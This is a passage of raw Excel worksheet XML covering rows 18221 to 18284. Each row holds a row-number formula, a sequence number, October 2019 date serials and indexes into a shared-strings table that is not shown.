      <c r="D18221" s="1">
        <v>43739</v>
      </c>
      <c r="E18221" t="s">
        <v>29663</v>
      </c>
      <c r="F18221" t="s">
        <v>10526</v>
      </c>
      <c r="G18221" t="s">
        <v>29664</v>
      </c>
    </row>
    <row r="18222" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18222">
        <f t="shared" si="284"/>
        <v>18221</v>
      </c>
      <c r="B18222">
        <v>3221</v>
      </c>
      <c r="C18222" t="s">
        <v>25497</v>
      </c>
      <c r="D18222" s="1">
        <v>43740</v>
      </c>
      <c r="E18222" t="s">
        <v>29665</v>
      </c>
      <c r="F18222" t="s">
        <v>9975</v>
      </c>
      <c r="G18222" t="s">
        <v>29666</v>
      </c>
    </row>
    <row r="18223" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18223">
        <f t="shared" si="284"/>
        <v>18222</v>
      </c>
      <c r="B18223">
        <v>3222</v>
      </c>
      <c r="C18223" t="s">
        <v>25497</v>
      </c>
      <c r="D18223" s="1">
        <v>43747</v>
      </c>
      <c r="F18223" t="s">
        <v>9975</v>
      </c>
      <c r="G18223" t="s">
        <v>29667</v>
      </c>
    </row>
    <row r="18224" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18224">
        <f t="shared" si="284"/>
        <v>18223</v>
      </c>
      <c r="B18224">
        <v>3223</v>
      </c>
      <c r="C18224" t="s">
        <v>25497</v>
      </c>
      <c r="D18224" s="1">
        <v>43747</v>
      </c>
      <c r="F18224" t="s">
        <v>9978</v>
      </c>
      <c r="G18224" t="s">
        <v>29668</v>
      </c>
    </row>
    <row r="18225" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18225">
        <f t="shared" si="284"/>
        <v>18224</v>
      </c>
      <c r="B18225">
        <v>3224</v>
      </c>
      <c r="C18225" t="s">
        <v>25497</v>
      </c>
      <c r="D18225" s="1">
        <v>43748</v>
      </c>
      <c r="E18225" t="s">
        <v>29669</v>
      </c>
      <c r="F18225" t="s">
        <v>9975</v>
      </c>
      <c r="G18225" t="s">
        <v>29670</v>
      </c>
    </row>
    <row r="18226" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18226">
        <f t="shared" si="284"/>
        <v>18225</v>
      </c>
      <c r="B18226">
        <v>3225</v>
      </c>
      <c r="C18226" t="s">
        <v>25497</v>
      </c>
      <c r="D18226" s="1">
        <v>43741</v>
      </c>
      <c r="E18226" t="s">
        <v>26651</v>
      </c>
      <c r="F18226" t="s">
        <v>9975</v>
      </c>
      <c r="G18226" t="s">
        <v>29671</v>
      </c>
    </row>
    <row r="18227" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18227">
        <f t="shared" si="284"/>
        <v>18226</v>
      </c>
      <c r="B18227">
        <v>3226</v>
      </c>
      <c r="C18227" t="s">
        <v>25497</v>
      </c>
      <c r="D18227" s="1">
        <v>43754</v>
      </c>
      <c r="E18227" t="s">
        <v>29672</v>
      </c>
      <c r="F18227" t="s">
        <v>9975</v>
      </c>
      <c r="G18227" t="s">
        <v>29673</v>
      </c>
    </row>
    <row r="18228" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18228">
        <f t="shared" si="284"/>
        <v>18227</v>
      </c>
      <c r="B18228">
        <v>3227</v>
      </c>
      <c r="C18228" t="s">
        <v>25497</v>
      </c>
      <c r="D18228" s="1">
        <v>43746</v>
      </c>
      <c r="E18228" t="s">
        <v>26178</v>
      </c>
      <c r="F18228" t="s">
        <v>9975</v>
      </c>
      <c r="G18228" t="s">
        <v>29674</v>
      </c>
    </row>
    <row r="18229" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18229">
        <f t="shared" si="284"/>
        <v>18228</v>
      </c>
      <c r="B18229">
        <v>3228</v>
      </c>
      <c r="C18229" t="s">
        <v>25497</v>
      </c>
      <c r="D18229" s="1">
        <v>43752</v>
      </c>
      <c r="E18229" t="s">
        <v>25502</v>
      </c>
      <c r="F18229" t="s">
        <v>9975</v>
      </c>
      <c r="G18229" t="s">
        <v>29675</v>
      </c>
    </row>
    <row r="18230" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18230">
        <f t="shared" si="284"/>
        <v>18229</v>
      </c>
      <c r="B18230">
        <v>3229</v>
      </c>
      <c r="C18230" t="s">
        <v>25497</v>
      </c>
      <c r="D18230" s="1">
        <v>43747</v>
      </c>
      <c r="F18230" t="s">
        <v>9975</v>
      </c>
      <c r="G18230" t="s">
        <v>29676</v>
      </c>
    </row>
    <row r="18231" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18231">
        <f t="shared" si="284"/>
        <v>18230</v>
      </c>
      <c r="B18231">
        <v>3230</v>
      </c>
      <c r="C18231" t="s">
        <v>25497</v>
      </c>
      <c r="D18231" s="1">
        <v>43739</v>
      </c>
      <c r="F18231" t="s">
        <v>9975</v>
      </c>
      <c r="G18231" t="s">
        <v>29677</v>
      </c>
    </row>
    <row r="18232" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18232">
        <f t="shared" si="284"/>
        <v>18231</v>
      </c>
      <c r="B18232">
        <v>3231</v>
      </c>
      <c r="C18232" t="s">
        <v>25497</v>
      </c>
      <c r="D18232" s="1">
        <v>43750</v>
      </c>
      <c r="F18232" t="s">
        <v>9975</v>
      </c>
      <c r="G18232" t="s">
        <v>29678</v>
      </c>
    </row>
    <row r="18233" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18233">
        <f t="shared" si="284"/>
        <v>18232</v>
      </c>
      <c r="B18233">
        <v>3232</v>
      </c>
      <c r="C18233" t="s">
        <v>25497</v>
      </c>
      <c r="D18233" s="1">
        <v>43741</v>
      </c>
      <c r="F18233" t="s">
        <v>10021</v>
      </c>
      <c r="G18233" t="s">
        <v>29679</v>
      </c>
    </row>
    <row r="18234" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18234">
        <f t="shared" si="284"/>
        <v>18233</v>
      </c>
      <c r="B18234">
        <v>3233</v>
      </c>
      <c r="C18234" t="s">
        <v>25497</v>
      </c>
      <c r="D18234" s="1">
        <v>43755</v>
      </c>
      <c r="E18234" t="s">
        <v>29680</v>
      </c>
      <c r="F18234" t="s">
        <v>9975</v>
      </c>
      <c r="G18234" t="s">
        <v>29681</v>
      </c>
    </row>
    <row r="18235" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18235">
        <f t="shared" si="284"/>
        <v>18234</v>
      </c>
      <c r="B18235">
        <v>3234</v>
      </c>
      <c r="C18235" t="s">
        <v>25497</v>
      </c>
      <c r="D18235" s="1">
        <v>43749</v>
      </c>
      <c r="E18235" t="s">
        <v>29682</v>
      </c>
      <c r="F18235" t="s">
        <v>10526</v>
      </c>
      <c r="G18235" t="s">
        <v>29683</v>
      </c>
    </row>
    <row r="18236" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18236">
        <f t="shared" si="284"/>
        <v>18235</v>
      </c>
      <c r="B18236">
        <v>3235</v>
      </c>
      <c r="C18236" t="s">
        <v>25497</v>
      </c>
      <c r="D18236" s="1">
        <v>43739</v>
      </c>
      <c r="E18236" t="s">
        <v>25942</v>
      </c>
      <c r="F18236" t="s">
        <v>9975</v>
      </c>
      <c r="G18236" t="s">
        <v>29684</v>
      </c>
    </row>
    <row r="18237" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18237">
        <f t="shared" si="284"/>
        <v>18236</v>
      </c>
      <c r="B18237">
        <v>3236</v>
      </c>
      <c r="C18237" t="s">
        <v>25497</v>
      </c>
      <c r="D18237" s="1">
        <v>43740</v>
      </c>
      <c r="E18237" t="s">
        <v>25543</v>
      </c>
      <c r="F18237" t="s">
        <v>9975</v>
      </c>
      <c r="G18237" t="s">
        <v>29685</v>
      </c>
    </row>
    <row r="18238" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18238">
        <f t="shared" si="284"/>
        <v>18237</v>
      </c>
      <c r="B18238">
        <v>3237</v>
      </c>
      <c r="C18238" t="s">
        <v>25497</v>
      </c>
      <c r="D18238" s="1">
        <v>43745</v>
      </c>
      <c r="E18238" t="s">
        <v>25517</v>
      </c>
      <c r="F18238" t="s">
        <v>9975</v>
      </c>
      <c r="G18238" t="s">
        <v>29686</v>
      </c>
    </row>
    <row r="18239" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18239">
        <f t="shared" si="284"/>
        <v>18238</v>
      </c>
      <c r="B18239">
        <v>3238</v>
      </c>
      <c r="C18239" t="s">
        <v>25497</v>
      </c>
      <c r="D18239" s="1">
        <v>43753</v>
      </c>
      <c r="F18239" t="s">
        <v>9975</v>
      </c>
      <c r="G18239" t="s">
        <v>29687</v>
      </c>
    </row>
    <row r="18240" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18240">
        <f t="shared" si="284"/>
        <v>18239</v>
      </c>
      <c r="B18240">
        <v>3239</v>
      </c>
      <c r="C18240" t="s">
        <v>25497</v>
      </c>
      <c r="D18240" s="1">
        <v>43748</v>
      </c>
      <c r="F18240" t="s">
        <v>9975</v>
      </c>
      <c r="G18240" t="s">
        <v>29688</v>
      </c>
    </row>
    <row r="18241" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18241">
        <f t="shared" si="284"/>
        <v>18240</v>
      </c>
      <c r="B18241">
        <v>3240</v>
      </c>
      <c r="C18241" t="s">
        <v>25497</v>
      </c>
      <c r="D18241" s="1">
        <v>43740</v>
      </c>
      <c r="E18241" t="s">
        <v>25517</v>
      </c>
      <c r="F18241" t="s">
        <v>9975</v>
      </c>
      <c r="G18241" t="s">
        <v>29689</v>
      </c>
    </row>
    <row r="18242" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18242">
        <f t="shared" si="284"/>
        <v>18241</v>
      </c>
      <c r="B18242">
        <v>3241</v>
      </c>
      <c r="C18242" t="s">
        <v>25497</v>
      </c>
      <c r="D18242" s="1">
        <v>43753</v>
      </c>
      <c r="F18242" t="s">
        <v>9975</v>
      </c>
      <c r="G18242" t="s">
        <v>29690</v>
      </c>
    </row>
    <row r="18243" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18243">
        <f t="shared" ref="A18243:A18306" si="285">+ROW(A18242)</f>
        <v>18242</v>
      </c>
      <c r="B18243">
        <v>3242</v>
      </c>
      <c r="C18243" t="s">
        <v>25497</v>
      </c>
      <c r="D18243" s="1">
        <v>43739</v>
      </c>
      <c r="E18243" t="s">
        <v>25592</v>
      </c>
      <c r="F18243" t="s">
        <v>9975</v>
      </c>
      <c r="G18243" t="s">
        <v>29691</v>
      </c>
    </row>
    <row r="18244" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18244">
        <f t="shared" si="285"/>
        <v>18243</v>
      </c>
      <c r="B18244">
        <v>3243</v>
      </c>
      <c r="C18244" t="s">
        <v>25497</v>
      </c>
      <c r="D18244" s="1">
        <v>43749</v>
      </c>
      <c r="F18244" t="s">
        <v>9975</v>
      </c>
      <c r="G18244" t="s">
        <v>29692</v>
      </c>
    </row>
    <row r="18245" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18245">
        <f t="shared" si="285"/>
        <v>18244</v>
      </c>
      <c r="B18245">
        <v>3244</v>
      </c>
      <c r="C18245" t="s">
        <v>25497</v>
      </c>
      <c r="D18245" s="1">
        <v>43739</v>
      </c>
      <c r="E18245" t="s">
        <v>25509</v>
      </c>
      <c r="F18245" t="s">
        <v>10021</v>
      </c>
      <c r="G18245" t="s">
        <v>29693</v>
      </c>
    </row>
    <row r="18246" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18246">
        <f t="shared" si="285"/>
        <v>18245</v>
      </c>
      <c r="B18246">
        <v>3245</v>
      </c>
      <c r="C18246" t="s">
        <v>25497</v>
      </c>
      <c r="D18246" s="1">
        <v>43755</v>
      </c>
      <c r="E18246" t="s">
        <v>29694</v>
      </c>
      <c r="F18246" t="s">
        <v>10526</v>
      </c>
      <c r="G18246" t="s">
        <v>29695</v>
      </c>
    </row>
    <row r="18247" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18247">
        <f t="shared" si="285"/>
        <v>18246</v>
      </c>
      <c r="B18247">
        <v>3246</v>
      </c>
      <c r="C18247" t="s">
        <v>25497</v>
      </c>
      <c r="D18247" s="1">
        <v>43749</v>
      </c>
      <c r="E18247" t="s">
        <v>25517</v>
      </c>
      <c r="F18247" t="s">
        <v>9975</v>
      </c>
      <c r="G18247" t="s">
        <v>29696</v>
      </c>
    </row>
    <row r="18248" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18248">
        <f t="shared" si="285"/>
        <v>18247</v>
      </c>
      <c r="B18248">
        <v>3247</v>
      </c>
      <c r="C18248" t="s">
        <v>25497</v>
      </c>
      <c r="D18248" s="1">
        <v>43754</v>
      </c>
      <c r="E18248" t="s">
        <v>25512</v>
      </c>
      <c r="F18248" t="s">
        <v>9975</v>
      </c>
      <c r="G18248" t="s">
        <v>29697</v>
      </c>
    </row>
    <row r="18249" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18249">
        <f t="shared" si="285"/>
        <v>18248</v>
      </c>
      <c r="B18249">
        <v>3248</v>
      </c>
      <c r="C18249" t="s">
        <v>25497</v>
      </c>
      <c r="D18249" s="1">
        <v>43749</v>
      </c>
      <c r="E18249" t="s">
        <v>28317</v>
      </c>
      <c r="F18249" t="s">
        <v>10526</v>
      </c>
      <c r="G18249" t="s">
        <v>29698</v>
      </c>
    </row>
    <row r="18250" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18250">
        <f t="shared" si="285"/>
        <v>18249</v>
      </c>
      <c r="B18250">
        <v>3249</v>
      </c>
      <c r="C18250" t="s">
        <v>25497</v>
      </c>
      <c r="D18250" s="1">
        <v>43749</v>
      </c>
      <c r="E18250" t="s">
        <v>29699</v>
      </c>
      <c r="F18250" t="s">
        <v>9975</v>
      </c>
      <c r="G18250" t="s">
        <v>29700</v>
      </c>
    </row>
    <row r="18251" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18251">
        <f t="shared" si="285"/>
        <v>18250</v>
      </c>
      <c r="B18251">
        <v>3250</v>
      </c>
      <c r="C18251" t="s">
        <v>25497</v>
      </c>
      <c r="D18251" s="1">
        <v>43756</v>
      </c>
      <c r="E18251" t="s">
        <v>29701</v>
      </c>
      <c r="F18251" t="s">
        <v>9975</v>
      </c>
      <c r="G18251" t="s">
        <v>29702</v>
      </c>
    </row>
    <row r="18252" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18252">
        <f t="shared" si="285"/>
        <v>18251</v>
      </c>
      <c r="B18252">
        <v>3251</v>
      </c>
      <c r="C18252" t="s">
        <v>25497</v>
      </c>
      <c r="D18252" s="1">
        <v>43744</v>
      </c>
      <c r="E18252" t="s">
        <v>29703</v>
      </c>
      <c r="F18252" t="s">
        <v>9975</v>
      </c>
      <c r="G18252" t="s">
        <v>29704</v>
      </c>
    </row>
    <row r="18253" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18253">
        <f t="shared" si="285"/>
        <v>18252</v>
      </c>
      <c r="B18253">
        <v>3252</v>
      </c>
      <c r="C18253" t="s">
        <v>25497</v>
      </c>
      <c r="D18253" s="1">
        <v>43746</v>
      </c>
      <c r="F18253" t="s">
        <v>9975</v>
      </c>
      <c r="G18253" t="s">
        <v>29705</v>
      </c>
    </row>
    <row r="18254" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18254">
        <f t="shared" si="285"/>
        <v>18253</v>
      </c>
      <c r="B18254">
        <v>3253</v>
      </c>
      <c r="C18254" t="s">
        <v>25497</v>
      </c>
      <c r="D18254" s="1">
        <v>43753</v>
      </c>
      <c r="E18254" t="s">
        <v>25517</v>
      </c>
      <c r="F18254" t="s">
        <v>9975</v>
      </c>
      <c r="G18254" t="s">
        <v>29706</v>
      </c>
    </row>
    <row r="18255" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18255">
        <f t="shared" si="285"/>
        <v>18254</v>
      </c>
      <c r="B18255">
        <v>3254</v>
      </c>
      <c r="C18255" t="s">
        <v>25497</v>
      </c>
      <c r="D18255" s="1">
        <v>43740</v>
      </c>
      <c r="F18255" t="s">
        <v>9975</v>
      </c>
      <c r="G18255" t="s">
        <v>29707</v>
      </c>
    </row>
    <row r="18256" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18256">
        <f t="shared" si="285"/>
        <v>18255</v>
      </c>
      <c r="B18256">
        <v>3255</v>
      </c>
      <c r="C18256" t="s">
        <v>25497</v>
      </c>
      <c r="D18256" s="1">
        <v>43739</v>
      </c>
      <c r="F18256" t="s">
        <v>9975</v>
      </c>
      <c r="G18256" t="s">
        <v>29708</v>
      </c>
    </row>
    <row r="18257" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18257">
        <f t="shared" si="285"/>
        <v>18256</v>
      </c>
      <c r="B18257">
        <v>3256</v>
      </c>
      <c r="C18257" t="s">
        <v>25497</v>
      </c>
      <c r="D18257" s="1">
        <v>43741</v>
      </c>
      <c r="E18257" t="s">
        <v>29709</v>
      </c>
      <c r="F18257" t="s">
        <v>9975</v>
      </c>
      <c r="G18257" t="s">
        <v>29710</v>
      </c>
    </row>
    <row r="18258" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18258">
        <f t="shared" si="285"/>
        <v>18257</v>
      </c>
      <c r="B18258">
        <v>3257</v>
      </c>
      <c r="C18258" t="s">
        <v>25497</v>
      </c>
      <c r="D18258" s="1">
        <v>43754</v>
      </c>
      <c r="E18258" t="s">
        <v>29711</v>
      </c>
      <c r="F18258" t="s">
        <v>9978</v>
      </c>
      <c r="G18258" t="s">
        <v>29712</v>
      </c>
    </row>
    <row r="18259" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18259">
        <f t="shared" si="285"/>
        <v>18258</v>
      </c>
      <c r="B18259">
        <v>3258</v>
      </c>
      <c r="C18259" t="s">
        <v>25497</v>
      </c>
      <c r="D18259" s="1">
        <v>43747</v>
      </c>
      <c r="F18259" t="s">
        <v>9975</v>
      </c>
      <c r="G18259" t="s">
        <v>29713</v>
      </c>
    </row>
    <row r="18260" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18260">
        <f t="shared" si="285"/>
        <v>18259</v>
      </c>
      <c r="B18260">
        <v>3259</v>
      </c>
      <c r="C18260" t="s">
        <v>25497</v>
      </c>
      <c r="D18260" s="1">
        <v>43748</v>
      </c>
      <c r="E18260" t="s">
        <v>25592</v>
      </c>
      <c r="F18260" t="s">
        <v>9975</v>
      </c>
      <c r="G18260" t="s">
        <v>29714</v>
      </c>
    </row>
    <row r="18261" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18261">
        <f t="shared" si="285"/>
        <v>18260</v>
      </c>
      <c r="B18261">
        <v>3260</v>
      </c>
      <c r="C18261" t="s">
        <v>25497</v>
      </c>
      <c r="D18261" s="1">
        <v>43743</v>
      </c>
      <c r="E18261" t="s">
        <v>26762</v>
      </c>
      <c r="F18261" t="s">
        <v>10021</v>
      </c>
      <c r="G18261" t="s">
        <v>29715</v>
      </c>
    </row>
    <row r="18262" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18262">
        <f t="shared" si="285"/>
        <v>18261</v>
      </c>
      <c r="B18262">
        <v>3261</v>
      </c>
      <c r="C18262" t="s">
        <v>25497</v>
      </c>
      <c r="D18262" s="1">
        <v>43755</v>
      </c>
      <c r="E18262" t="s">
        <v>25584</v>
      </c>
      <c r="F18262" t="s">
        <v>9975</v>
      </c>
      <c r="G18262" t="s">
        <v>29716</v>
      </c>
    </row>
    <row r="18263" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18263">
        <f t="shared" si="285"/>
        <v>18262</v>
      </c>
      <c r="B18263">
        <v>3262</v>
      </c>
      <c r="C18263" t="s">
        <v>25497</v>
      </c>
      <c r="D18263" s="1">
        <v>43742</v>
      </c>
      <c r="F18263" t="s">
        <v>9975</v>
      </c>
      <c r="G18263" t="s">
        <v>29717</v>
      </c>
    </row>
    <row r="18264" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18264">
        <f t="shared" si="285"/>
        <v>18263</v>
      </c>
      <c r="B18264">
        <v>3263</v>
      </c>
      <c r="C18264" t="s">
        <v>25497</v>
      </c>
      <c r="D18264" s="1">
        <v>43745</v>
      </c>
      <c r="E18264" t="s">
        <v>29718</v>
      </c>
      <c r="F18264" t="s">
        <v>9975</v>
      </c>
      <c r="G18264" t="s">
        <v>29719</v>
      </c>
    </row>
    <row r="18265" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18265">
        <f t="shared" si="285"/>
        <v>18264</v>
      </c>
      <c r="B18265">
        <v>3264</v>
      </c>
      <c r="C18265" t="s">
        <v>25497</v>
      </c>
      <c r="D18265" s="1">
        <v>43756</v>
      </c>
      <c r="E18265" t="s">
        <v>29720</v>
      </c>
      <c r="F18265" t="s">
        <v>9975</v>
      </c>
      <c r="G18265" t="s">
        <v>29721</v>
      </c>
    </row>
    <row r="18266" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18266">
        <f t="shared" si="285"/>
        <v>18265</v>
      </c>
      <c r="B18266">
        <v>3265</v>
      </c>
      <c r="C18266" t="s">
        <v>25497</v>
      </c>
      <c r="D18266" s="1">
        <v>43745</v>
      </c>
      <c r="E18266" t="s">
        <v>25723</v>
      </c>
      <c r="F18266" t="s">
        <v>9975</v>
      </c>
      <c r="G18266" t="s">
        <v>25724</v>
      </c>
    </row>
    <row r="18267" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18267">
        <f t="shared" si="285"/>
        <v>18266</v>
      </c>
      <c r="B18267">
        <v>3266</v>
      </c>
      <c r="C18267" t="s">
        <v>25497</v>
      </c>
      <c r="D18267" s="1">
        <v>43740</v>
      </c>
      <c r="F18267" t="s">
        <v>9975</v>
      </c>
      <c r="G18267" t="s">
        <v>29722</v>
      </c>
    </row>
    <row r="18268" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18268">
        <f t="shared" si="285"/>
        <v>18267</v>
      </c>
      <c r="B18268">
        <v>3267</v>
      </c>
      <c r="C18268" t="s">
        <v>25497</v>
      </c>
      <c r="D18268" s="1">
        <v>43754</v>
      </c>
      <c r="F18268" t="s">
        <v>9975</v>
      </c>
      <c r="G18268" t="s">
        <v>29723</v>
      </c>
    </row>
    <row r="18269" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18269">
        <f t="shared" si="285"/>
        <v>18268</v>
      </c>
      <c r="B18269">
        <v>3268</v>
      </c>
      <c r="C18269" t="s">
        <v>25497</v>
      </c>
      <c r="D18269" s="1">
        <v>43753</v>
      </c>
      <c r="F18269" t="s">
        <v>9975</v>
      </c>
      <c r="G18269" t="s">
        <v>29724</v>
      </c>
    </row>
    <row r="18270" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18270">
        <f t="shared" si="285"/>
        <v>18269</v>
      </c>
      <c r="B18270">
        <v>3269</v>
      </c>
      <c r="C18270" t="s">
        <v>25497</v>
      </c>
      <c r="D18270" s="1">
        <v>43753</v>
      </c>
      <c r="F18270" t="s">
        <v>9975</v>
      </c>
      <c r="G18270" t="s">
        <v>29725</v>
      </c>
    </row>
    <row r="18271" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18271">
        <f t="shared" si="285"/>
        <v>18270</v>
      </c>
      <c r="B18271">
        <v>3270</v>
      </c>
      <c r="C18271" t="s">
        <v>25497</v>
      </c>
      <c r="D18271" s="1">
        <v>43748</v>
      </c>
      <c r="F18271" t="s">
        <v>9975</v>
      </c>
      <c r="G18271" t="s">
        <v>29726</v>
      </c>
    </row>
    <row r="18272" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18272">
        <f t="shared" si="285"/>
        <v>18271</v>
      </c>
      <c r="B18272">
        <v>3271</v>
      </c>
      <c r="C18272" t="s">
        <v>25497</v>
      </c>
      <c r="D18272" s="1">
        <v>43745</v>
      </c>
      <c r="F18272" t="s">
        <v>9975</v>
      </c>
      <c r="G18272" t="s">
        <v>29727</v>
      </c>
    </row>
    <row r="18273" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18273">
        <f t="shared" si="285"/>
        <v>18272</v>
      </c>
      <c r="B18273">
        <v>3272</v>
      </c>
      <c r="C18273" t="s">
        <v>25497</v>
      </c>
      <c r="D18273" s="1">
        <v>43753</v>
      </c>
      <c r="E18273" t="s">
        <v>29728</v>
      </c>
      <c r="F18273" t="s">
        <v>9975</v>
      </c>
      <c r="G18273" t="s">
        <v>29729</v>
      </c>
    </row>
    <row r="18274" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18274">
        <f t="shared" si="285"/>
        <v>18273</v>
      </c>
      <c r="B18274">
        <v>3273</v>
      </c>
      <c r="C18274" t="s">
        <v>25497</v>
      </c>
      <c r="D18274" s="1">
        <v>43757</v>
      </c>
      <c r="F18274" t="s">
        <v>9975</v>
      </c>
      <c r="G18274" t="s">
        <v>29730</v>
      </c>
    </row>
    <row r="18275" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18275">
        <f t="shared" si="285"/>
        <v>18274</v>
      </c>
      <c r="B18275">
        <v>3274</v>
      </c>
      <c r="C18275" t="s">
        <v>25497</v>
      </c>
      <c r="D18275" s="1">
        <v>43740</v>
      </c>
      <c r="E18275" t="s">
        <v>29731</v>
      </c>
      <c r="F18275" t="s">
        <v>10021</v>
      </c>
      <c r="G18275" t="s">
        <v>29732</v>
      </c>
    </row>
    <row r="18276" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18276">
        <f t="shared" si="285"/>
        <v>18275</v>
      </c>
      <c r="B18276">
        <v>3275</v>
      </c>
      <c r="C18276" t="s">
        <v>25497</v>
      </c>
      <c r="D18276" s="1">
        <v>43746</v>
      </c>
      <c r="E18276" t="s">
        <v>29733</v>
      </c>
      <c r="F18276" t="s">
        <v>9975</v>
      </c>
      <c r="G18276" t="s">
        <v>29734</v>
      </c>
    </row>
    <row r="18277" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18277">
        <f t="shared" si="285"/>
        <v>18276</v>
      </c>
      <c r="B18277">
        <v>3276</v>
      </c>
      <c r="C18277" t="s">
        <v>25497</v>
      </c>
      <c r="D18277" s="1">
        <v>43749</v>
      </c>
      <c r="E18277" t="s">
        <v>25592</v>
      </c>
      <c r="F18277" t="s">
        <v>9975</v>
      </c>
      <c r="G18277" t="s">
        <v>29735</v>
      </c>
    </row>
    <row r="18278" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18278">
        <f t="shared" si="285"/>
        <v>18277</v>
      </c>
      <c r="B18278">
        <v>3277</v>
      </c>
      <c r="C18278" t="s">
        <v>25497</v>
      </c>
      <c r="D18278" s="1">
        <v>43748</v>
      </c>
      <c r="F18278" t="s">
        <v>9975</v>
      </c>
      <c r="G18278" t="s">
        <v>29736</v>
      </c>
    </row>
    <row r="18279" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18279">
        <f t="shared" si="285"/>
        <v>18278</v>
      </c>
      <c r="B18279">
        <v>3278</v>
      </c>
      <c r="C18279" t="s">
        <v>25497</v>
      </c>
      <c r="D18279" s="1">
        <v>43742</v>
      </c>
      <c r="E18279" t="s">
        <v>25592</v>
      </c>
      <c r="F18279" t="s">
        <v>9975</v>
      </c>
      <c r="G18279" t="s">
        <v>29737</v>
      </c>
    </row>
    <row r="18280" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18280">
        <f t="shared" si="285"/>
        <v>18279</v>
      </c>
      <c r="B18280">
        <v>3279</v>
      </c>
      <c r="C18280" t="s">
        <v>25497</v>
      </c>
      <c r="D18280" s="1">
        <v>43756</v>
      </c>
      <c r="E18280" t="s">
        <v>19705</v>
      </c>
      <c r="F18280" t="s">
        <v>9975</v>
      </c>
      <c r="G18280" t="s">
        <v>29738</v>
      </c>
    </row>
    <row r="18281" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18281">
        <f t="shared" si="285"/>
        <v>18280</v>
      </c>
      <c r="B18281">
        <v>3280</v>
      </c>
      <c r="C18281" t="s">
        <v>25497</v>
      </c>
      <c r="D18281" s="1">
        <v>43745</v>
      </c>
      <c r="E18281" t="s">
        <v>25517</v>
      </c>
      <c r="F18281" t="s">
        <v>9975</v>
      </c>
      <c r="G18281" t="s">
        <v>29739</v>
      </c>
    </row>
    <row r="18282" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18282">
        <f t="shared" si="285"/>
        <v>18281</v>
      </c>
      <c r="B18282">
        <v>3281</v>
      </c>
      <c r="C18282" t="s">
        <v>25497</v>
      </c>
      <c r="D18282" s="1">
        <v>43753</v>
      </c>
      <c r="F18282" t="s">
        <v>9978</v>
      </c>
      <c r="G18282" t="s">
        <v>29740</v>
      </c>
    </row>
    <row r="18283" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18283">
        <f t="shared" si="285"/>
        <v>18282</v>
      </c>
      <c r="B18283">
        <v>3282</v>
      </c>
      <c r="C18283" t="s">
        <v>25497</v>
      </c>
      <c r="D18283" s="1">
        <v>43754</v>
      </c>
      <c r="E18283" t="s">
        <v>29741</v>
      </c>
      <c r="F18283" t="s">
        <v>9975</v>
      </c>
      <c r="G18283" t="s">
        <v>29742</v>
      </c>
    </row>
    <row r="18284" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18284">
        <f t="shared" si="285"/>
        <v>18283</v>
      </c>
      <c r="B18284">
        <v>3283</v>
      </c>
      <c r="C18284" t="s">
        <v>25497</v>
      </c>
      <c r="D18284" s="1">
        <v>43753</v>
      </c>
      <c r="E18284" t="s">
        <v>29743</v>
      </c>
      <c r="F18284" t="s">
        <v>9975</v>
      </c>
      <c r="G18284" t="s">
        <v>29744</v>
      </c>
    </row>
    <row r="18285" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18285">
        <f t="shared" si="285"/>
